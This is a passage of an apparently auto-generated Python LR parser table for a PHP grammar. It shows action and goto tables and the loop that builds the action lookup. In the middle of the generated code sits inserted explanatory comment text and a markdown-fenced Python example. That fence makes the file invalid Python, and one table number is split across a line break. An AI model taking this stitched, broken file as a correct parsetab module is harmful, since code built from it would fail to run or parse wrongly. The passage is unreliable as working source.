28,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'SR_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[202,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'ENCAPSED_AND_WHITESPACE':([76,98,99,103,186,257,258,262,263,264,266,366,420,421,422,435,460,471,610,611,691,692,694,739,799,901,],[-443,-443,-443,-443,-443,421,-432,421,435,-360,421,421,-431,-433,-434,-359,599,-443,739,-388,-436,-437,-439,-387,-435,-438,]),'DOLLAR_OPEN_CURLY_BRACES':([76,98,103,186,257,258,262,266,366,420,421,422,691,692,694,799,901,],[-443,-443,-443,-443,423,-432,423,423,423,-431,-433,-434,-436,-437,-439,-435,-438,]),'CURLY_OPEN':([76,98,103,186,257,258,262,266,366,420,421,422,691,692,694,799,901,],[-443,-443,-443,-443,424,-432,424,424,424,-431,-433,-434,-436,-437,-439,-435,-438,]),'END_HEREDOC':([98,258,262,420,421,422,471,610,611,691,692,694,739,799,901,],[-443,-432,433,-431,-433,-434,-443,738,-388,-436,-437,-439,-387,-435,-438,]),'END_NOWDOC':([99,263,264,435,],[-443,434,-360,-359,]),'IMPLEMENTS':([116,117,188,279,367,368,515,516,652,775,],[-429,-430,-443,-428,513,-115,-116,-117,-118,-119,]),'EXTENDS':([188,189,],[369,371,]),'VAR':([373,519,522,523,650,654,655,658,774,777,844,849,853,890,893,930,946,966,968,974,977,],[-443,-443,664,-130,-443,664,-136,-129,664,-135,-139,-132,-134,-138,-141,-133,-140,-131,-157,-137,-156,]),'PUBLIC':([373,519,522,523,650,654,655,658,662,665,666,667,668,669,670,671,672,774,777,788,844,849,853,890,893,930,946,950,966,968,974,977,],[-443,-443,670,-130,-443,670,-136,-129,670,-159,-163,-164,-16
5,-166,-160,-161,-162,670,-135,-158,-139,-132,-134,-138,-141,-133,-140,670,-131,-157,-137,-156,]),'PROTECTED':([373,519,522,523,650,654,655,658,662,665,666,667,668,669,670,671,672,774,777,788,844,849,853,890,893,930,946,950,966,968,974,977,],[-443,-443,671,-130,-443,671,-136,-129,671,-159,-163,-164,-165,-166,-160,-161,-162,671,-135,-158,-139,-132,-134,-138,-141,-133,-140,671,-131,-157,-137,-156,]),'PRIVATE':([373,519,522,523,650,654,655,658,662,665,666,667,668,669,670,671,672,774,777,788,844,849,853,890,893,930,946,950,966,968,974,977,],[-443,-443,672,-130,-443,672,-136,-129,672,-159,-163,-164,-165,-166,-160,-161,-162,672,-135,-158,-139,-132,-134,-138,-141,-133,-140,672,-131,-157,-137,-156,]),'CATCH':([500,636,637,973,],[-443,760,-53,-52,]),'FINALLY':([500,636,637,973,],[-443,761,-53,-52,]),'NUM_STRING':([550,],[690,]),}
_lr_action = {}
for _k, _v in _lr_action_items.items():
    for _x, _y in zip(_v[0], _v[1]):
        if _x not in _lr_action:
            _lr_action[_x] = {}
        _lr_action[_x][_k] = _y
del _lr_action_items
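# The table built above is consumed as _lr_action[state][token]: a positive
# entry shifts to that state, a negative entry reduces by production number
# -entry in _lr_productions, and 0 accepts. A minimal sketch of that lookup,
# using a small hypothetical table rather than the generated one:

```python
# Illustrative only: a toy LR action table shaped like _lr_action above.
# The states and tokens here are hypothetical, not from the generated data.
toy_action = {0: {'NUM': 3}, 3: {'$end': -1}}

def lr_action(state, token):
    # A missing entry signals a syntax error in a real parser driver.
    return toy_action.get(state, {}).get(token)

shift_target = lr_action(0, 'NUM')   # positive entry: shift to state 3
reduce_rule = lr_action(3, '$end')   # negative entry: reduce by production 1
```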
_lr_goto_items = {'start':([0,],[1,]),'top_statement_list':([0,114,276,],[2,277,442,]),'empty':([0,13,34,45,76,98,99,103,110,114,119,132,161,180,186,188,189,205,206,217,218,221,265,267,276,300,301,365,367,373,389,418,425,444,468,471,479,489,500,504,519,522,530,533,535,549,556,557,559,560,602,605,613,614,616,622,626,631,632,636,640,644,650,654,740,742,748,752,755,758,774,784,803,806,815,832,835,836,842,852,856,871,874,892,908,911,913,927,944,955,962,967,],[3,121,185,220,258,258,264,258,185,3,282,308,340,121,258,368,372,308,390,400,220,405,282,308,3,480,482,507,514,523,282,480,282,282,604,611,282,340,637,507,655,663,676,400,400,686,282,282,282,282,604,405,741,121,308,121,750,756,756,762,121,768,655,663,813,816,340,400,756,756,663,185,282,282,865,121,121,121,185,899,480,121,121,899,121,121,121,507,507,121,121,121,]),'top_statement':([2,277,442,],[4,4,4,]),'statement':([2,19,120,277,360,442,477,487,501,742,746,763,814,822,868,881,883,884,912,914,934,937,938,940,964,972,975,],[5,160,287,5,287,5,613,621,639,287,287,287,862,870,910,287,287,287,287,287,951,287,287,287,287,287,287,]),'function_declaration_statement':([2,120,277,360,442,742,746,763,881,883,884,912,914,937,938,940,964,972,975,],[6,288,6,288,6,288,288,288,288,288,288,288,288,288,288,288,288,288,288,]),'class_declaration_statement':([2,120,277,360,442,742,746,763,881,883,884,912,914,937,938,940,964,972,975,],[7,289,7,289,7,289,289,289,289,289,289,289,289,289,289,289,289,289,289,]),'namespace_name':([2,9,11,15,19,23,24,25,28,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,81,115,119,120,128,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,210,217,218,222,230,244,245,246,251,265,267,268,270,277,284,291,294,296,304,336,351,354,356,360,365,369,371,375,389,393,404,407,409,423,424,425,429,432,442,444,446,455,456,457,465,468,477,479,485,487,488,489,490,491,49
9,501,503,504,513,517,528,532,533,535,537,540,545,556,557,559,560,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,601,602,616,617,629,645,646,653,656,661,679,682,693,734,735,742,746,748,751,752,763,764,771,773,781,796,803,806,814,822,826,831,839,851,860,861,868,881,883,884,894,898,907,912,914,924,925,927,928,934,937,938,940,944,964,972,975,],[12,12,113,127,12,12,12,12,12,12,209,12,12,12,12,12,12,229,229,12,12,12,12,12,12,12,12,12,12,12,12,12,12,259,278,12,12,298,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,229,229,12,12,12,12,12,12,12,12,12,12,12,12,12,392,229,12,229,408,229,12,12,12,12,12,12,12,12,229,12,464,127,12,12,12,464,12,12,209,516,516,12,12,529,12,12,541,12,229,12,12,12,12,12,12,464,464,464,600,464,12,12,12,12,12,12,12,229,229,12,464,209,516,652,12,12,229,229,229,229,229,12,12,12,12,464,464,464,464,464,464,464,464,464,464,464,464,464,464,464,464,464,464,464,464,464,464,464,464,730,464,12,12,229,209,464,775,516,516,12,12,12,464,464,12,12,12,229,229,12,464,464,464,516,229,12,12,12,12,12,516,464,464,464,12,12,12,12,12,464,516,12,12,12,464,516,209,464,12,12,12,12,209,12,12,12,]),'expr':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,277,291,304,336,351,356,360,375,389,404,407,423,425,429,432,442,444,446,477,479,485,487,488,489,490,501,528,532,556,557,559,560,616,617,679,682,693,742,746,748,763,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[17,109,17,165,167,169,178,181,216,223,224,225,226,227,236,237,238,239,240,241,242,243,247,248,249,250,252,253,283,17,299,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,335,337,342,343,3
44,374,376,377,378,379,380,381,382,383,384,385,386,306,223,414,415,417,283,306,439,440,17,450,483,486,494,497,17,524,283,538,539,552,283,558,561,17,283,283,17,283,619,17,623,342,625,17,674,677,283,283,283,283,306,745,794,795,800,17,17,342,17,283,283,17,17,873,905,17,17,17,17,936,17,17,17,17,17,17,17,17,17,]),'class_entry_type':([2,120,277,360,442,742,746,763,881,883,884,912,914,937,938,940,964,972,975,],[36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,]),'variable':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,265,267,268,270,277,284,291,304,336,351,356,360,375,389,404,407,423,424,425,429,432,442,444,446,477,479,485,487,488,489,490,491,499,501,528,532,533,535,537,540,545,556,557,559,560,616,617,629,679,682,693,742,746,748,751,752,763,796,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[39,39,39,39,39,39,39,39,39,39,39,39,39,39,228,235,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,350,359,39,39,39,39,39,39,39,39,39,39,39,39,39,399,39,406,413,39,39,39,39,39,39,39,39,447,39,39,39,39,39,39,39,39,39,39,39,554,39,39,39,39,39,39,39,39,39,39,39,39,39,628,359,39,39,39,399,399,681,683,684,39,39,39,39,39,39,753,39,39,39,39,39,39,628,399,39,855,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,]),'scalar':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,277,291,304,336,351,356,360,375,389,404,407,423,425,429,432,442,
444,446,477,479,485,487,488,489,490,501,528,532,556,557,559,560,616,617,679,682,693,742,746,748,763,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,]),'exit_or_die':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,277,291,304,336,351,356,360,375,389,404,407,423,425,429,432,442,444,446,477,479,485,487,488,489,490,501,528,532,556,557,559,560,616,617,679,682,693,742,746,748,763,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,]),'base_variable_with_function_calls':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,265,267,268,270,277,284,291,304,
336,351,356,360,375,389,404,407,423,424,425,429,432,442,444,446,477,479,485,487,488,489,490,491,499,501,528,532,533,535,537,540,545,556,557,559,560,616,617,629,679,682,693,742,746,748,751,752,763,796,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,]),'class_constant':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,277,291,294,304,336,351,354,356,360,375,389,404,407,423,425,429,432,442,444,446,455,456,457,468,477,479,485,487,488,489,490,501,503,528,532,556,557,559,560,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,616,617,646,679,682,693,734,735,742,746,748,763,764,771,773,803,806,814,822,826,839,851,860,861,868,881,883,884,894,907,912,914,924,928,934,937,938,940,964,972,975,],[74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,459,74,74,74,459,74,74,74,74,74,74,74,74,74,74,74,74,74,459,459,459,459,74,74,74,74,74,74,74,74,459,74,74,74,74,74,74,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,459,74,74
,459,74,74,74,459,459,74,74,74,74,459,459,459,74,74,74,74,74,459,459,459,74,74,74,74,74,459,74,74,74,459,459,74,74,74,74,74,74,74,]),'common_scalar':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,277,291,294,304,336,351,354,356,360,375,389,404,407,423,425,429,432,442,444,446,455,456,457,468,477,479,485,487,488,489,490,501,503,528,532,556,557,559,560,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,616,617,646,679,682,693,734,735,742,746,748,763,764,771,773,803,806,814,822,826,839,851,860,861,868,881,883,884,894,907,912,914,924,928,934,937,938,940,964,972,975,],[75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,458,75,75,75,458,75,75,75,75,75,75,75,75,75,75,75,75,75,458,458,458,458,75,75,75,75,75,75,75,75,458,75,75,75,75,75,75,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,75,75,458,75,75,75,458,458,75,75,75,75,458,458,458,75,75,75,75,75,458,458,458,75,75,75,75,75,458,75,75,75,458,458,75,75,75,75,75,75,75,]),'scalar_heredoc':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,277,291,304,336,351,356,360,375,389,404,407,423,425,429,432,442,444,446,477,479,485,487,488,489,490,501,528,532,556,557,559,560,616,617,679,682,693,742,746,748,763,803,806,814,822,826,861,868,
881,883,884,907,912,914,934,937,938,940,964,972,975,],[77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,]),'nowdoc':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,277,291,294,304,336,351,354,356,360,375,389,404,407,423,425,429,432,442,444,446,455,456,457,468,477,479,485,487,488,489,490,501,503,528,532,556,557,559,560,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,616,617,646,679,682,693,734,735,742,746,748,763,764,771,773,803,806,814,822,826,839,851,860,861,868,881,883,884,894,907,912,914,924,928,934,937,938,940,964,972,975,],[78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,462,78,78,78,462,78,78,78,78,78,78,78,78,78,78,78,78,78,462,462,462,462,78,78,78,78,78,78,78,78,462,78,78,78,78,78,78,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,462,78,78,462,78,78,78,462,462,78,78,78,78,462,462,462,78,78,78,78,78,462,462,462,78,78,78,78,78,462,78,78,78,462,462,78,78,78,78,78,78,78,]),'class_name_constant':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,1
43,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,277,291,294,304,336,351,354,356,360,375,389,404,407,423,425,429,432,442,444,446,455,456,457,468,477,479,485,487,488,489,490,501,503,528,532,556,557,559,560,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,616,617,646,679,682,693,734,735,742,746,748,763,764,771,773,803,806,814,822,826,839,851,860,861,868,881,883,884,894,907,912,914,924,928,934,937,938,940,964,972,975,],[79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,463,79,79,79,463,79,79,79,79,79,79,79,79,79,79,79,79,79,463,463,463,463,79,79,79,79,79,79,79,79,463,79,79,79,79,79,79,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,463,79,79,463,79,79,79,463,463,79,79,79,79,463,463,463,79,79,79,79,79,463,463,463,79,79,79,79,79,463,79,79,79,463,463,79,79,79,79,79,79,79,]),'base_variable':([2,9,19,23,24,25,28,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,265,267,268,270,277,284,291,304,336,351,356,360,375,389,404,407,423,424,425,429,432,442,444,446,477,479,485,487,488,489,490,491,499,501,528,532,533,535,537,540,545,556,557,559,560,616,617,629,679,682,693,742,746,748,751,752,763,796,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[84,84,84,84,84,84,84,84,212,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,8
4,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,]),'function_call':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,265,267,268,270,277,284,291,304,336,351,356,360,375,389,404,407,423,424,425,429,432,442,444,446,477,479,485,487,488,489,490,491,499,501,528,532,533,535,537,540,545,556,557,559,560,616,617,629,679,682,693,742,746,748,751,752,763,796,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,]),'class_name':([2,9,19,23,24,25,28,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,265,267,268,270,277,284,291,294,304,336,351,354,356,360,365,375,389,404,407,423,424,425,429,432,442,444,446,455,456,457,468,477,479,485,487,488,489,490,491,499,501,503,504,528,532,533,53
5,537,540,545,556,557,559,560,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,616,617,629,645,646,679,682,693,734,735,742,746,748,751,752,763,764,771,773,796,803,806,814,822,826,839,851,860,861,868,881,883,884,894,907,912,914,924,927,928,934,937,938,940,944,964,972,975,],[86,86,86,86,86,86,86,86,207,86,86,86,86,86,86,232,232,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,232,232,86,86,86,86,86,86,86,86,86,86,86,86,86,232,86,232,232,86,86,86,86,86,86,86,86,232,86,469,86,86,86,469,86,86,509,86,86,86,86,86,232,86,86,86,86,86,86,469,469,469,469,86,86,86,86,86,86,86,232,232,86,469,509,86,86,232,232,232,232,232,86,86,86,86,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,469,86,86,232,509,469,86,86,86,469,469,86,86,86,232,232,86,469,469,469,232,86,86,86,86,86,469,469,469,86,86,86,86,86,469,86,86,86,469,509,469,86,86,86,86,509,86,86,86,]),'variable_class_name':([2,9,19,23,24,25,28,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,265,267,268,270,277,284,291,294,304,336,351,354,356,360,375,389,404,407,423,424,425,429,432,442,444,446,455,456,457,468,477,479,485,487,488,489,490,491,499,501,503,528,532,533,535,537,540,545,556,557,559,560,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,616,617,629,646,679,682,693,734,735,742,746,748,751,752,763,764,771,773,796,803,806,814,822,826,839,851,860,861,868,881,883,884,894,907,912,914,924,928,934,937,938,940,964,972,975,],[87,87,87,87,87,87,87,87,215,87,87,87,87,87,87,233,233,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,8
7,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,233,233,87,87,87,87,87,87,87,87,87,87,87,87,87,233,87,233,233,87,87,87,87,87,87,87,87,233,87,470,87,87,87,470,87,87,87,87,87,87,87,233,87,87,87,87,87,87,470,470,470,470,87,87,87,87,87,87,87,233,233,87,470,87,87,233,233,233,233,233,87,87,87,87,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,87,87,233,470,87,87,87,470,470,87,87,87,233,233,87,470,470,470,233,87,87,87,87,87,470,470,470,87,87,87,87,87,470,87,87,87,470,470,87,87,87,87,87,87,87,]),'simple_indirect_reference':([2,9,19,23,24,25,28,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,105,119,120,129,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,256,260,261,265,267,268,270,277,284,291,304,336,351,356,360,375,389,391,394,395,404,407,410,411,423,424,425,429,432,442,444,446,477,479,485,487,488,489,490,491,499,501,528,532,533,535,537,540,545,556,557,559,560,616,617,629,679,682,693,742,746,748,751,752,763,790,796,797,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[100,100,100,100,100,100,100,100,213,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,269,100,100,100,305,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,305,305,305,100,100,100,100,100,100,100,100,100,100,100,100,100,100,305,305,305,100,100,305,305,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,305,100,305,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,]),'static_member':
([2,9,19,23,24,25,28,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,265,267,268,270,277,284,291,304,336,351,356,360,375,389,404,407,423,424,425,429,432,442,444,446,477,479,485,487,488,489,490,491,499,501,528,532,533,535,537,540,545,556,557,559,560,616,617,629,679,682,693,742,746,748,751,752,763,796,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,10